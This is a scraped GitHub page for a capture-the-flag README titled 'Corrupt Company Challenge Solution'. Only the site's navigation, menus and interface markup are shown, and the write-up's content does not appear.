d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> TwentySick </span> <span>/</span> CTF <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>1</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/TwentySick/CTF/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div > Permalink <div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":475531499,"originating_url":"https://github.com/TwentySick/CTF/blob/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md","user_id":null}}" data-hydro-click-hmac="0fd38d303ff8ae97b80afecb0c7c2764f91990cbe6160602c7ae74337396c3b7"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>f1cc03f13b</span> <span></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/TwentySick/CTF/refs" cache-key="v0:1648969716.64959" current-committish="ZjFjYzAzZjEzYjAwMGJhYTE2ZjA2YWQ1OTQxOWMzYzgwMzA5MGQxNw==" default-branch="bWFpbg==" name-with-owner="VHdlbnR5U2ljay9DVEY=" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <footer class="SelectMenu-footer">View all branches</footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/TwentySick/CTF/refs" cache-key="v0:1648969716.64959" current-committish="ZjFjYzAzZjEzYjAwMGJhYTE2ZjA2YWQ1OTQxOWMzYzgwMzA5MGQxNw==" default-branch="bWFpbg==" name-with-owner="VHdlbnR5U2ljay9DVEY=" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div> </details> </div> <div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div> </div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div> <h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>CTF</span></span></span><span>/</span><span><span>2022</span></span><span>/</span><span><span>DCTF</span></span><span>/</span><span><span>misc</span></span><span>/</span><span><span>corrupt_company</span></span><span>/</span>README.md </h2> Go to file <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span></button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="2022/DCTF/misc/corrupt_company/README.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path </clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/TwentySick/CTF/blob/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span> </clipboard-copy> </div></details></div> <div id="spoof-warning" class="mt-0 pb-3" hidden aria-hidden> <div data-view-component="true" class="flash flash-warn mt-0 clearfix"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert float-left mt-1"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <div class="overflow-hidden">This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.</div> </div></div> <include-fragment src="/TwentySick/CTF/spoofed_commit_check/f1cc03f13b000baa16f06ad59419c3c803090d17" data-test-selector="spoofed-commit-check"></include-fragment> <div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/TwentySick/CTF/contributors/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div> <div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment></div> <readme-toc> <div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header js-blob-header blob-header js-sticky js-position-sticky top-0 p-2 d-flex flex-shrink-0 flex-md-row flex-items-center" style="position: sticky; z-index: 1;" > <details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":475531499,"originating_url":"https://github.com/TwentySick/CTF/blob/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md","user_id":null}}" data-menu-hydro-click-hmac="ea30bc44391ec3134b4ca3a0e6a316180cedb36ee6dbf2a9f127e4e27882e350" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg> </summary> <details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;"> <div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> Corrupt Company Challenge Solution </div> </div> </details-menu></details> <div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1"> 23 lines (16 sloc) <span></span> 1 KB </div> <div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div> <div class="BtnGroup"> Raw Blame </div> <div class="d-flex"> <div class="ml-1" > </option></form><form class="BtnGroup-parent js-update-url-with-hash " data-turbo="false" action="/TwentySick/CTF/edit/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="7zSg5OGxF31jFgcXcGf-wXCA1GPo2SvYPcj4Bz6gO9iKQZOibgqO9HJTI5OF3jLA6pcxc5LXQ8y9aRGPZGl4hA" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" data-hotkey="e" data-disable-with="" type="submit" data-view-component="true" class="btn-sm BtnGroup-item btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path></svg></button></form> <details class="details-reset details-overlay select-menu BtnGroup-parent d-inline-block position-relative"> <summary data-disable-invalid="" data-disable-with="" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":475531499,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":false}}" aria-label="Select additional options" data-view-component="true" class="js-blob-dropdown-click select-menu-button btn-sm btn BtnGroup-item float-none px-2"></summary> <div class="SelectMenu right-0"> <div class="SelectMenu-modal width-full"> <div class="SelectMenu-list SelectMenu-list--borderless py-2"> </option></form><form class="SelectMenu-item js-update-url-with-hash " data-turbo="false" action="/TwentySick/CTF/edit/f1cc03f13b000baa16f06ad59419c3c803090d17/2022/DCTF/misc/corrupt_company/README.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="BJlBPkMtLhS1FrT_-nj_IV2n-0knxhlz7kATrFj0ZAJh7HJ4zJa3naRTkHsPwTMgx7AeWV3IcWdu4fokAj0nXg" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" type="submit" data-view-component="true" class="btn-invisible btn width-full d-flex flex-justify-between color-fg-muted text-normal p-0"> <div 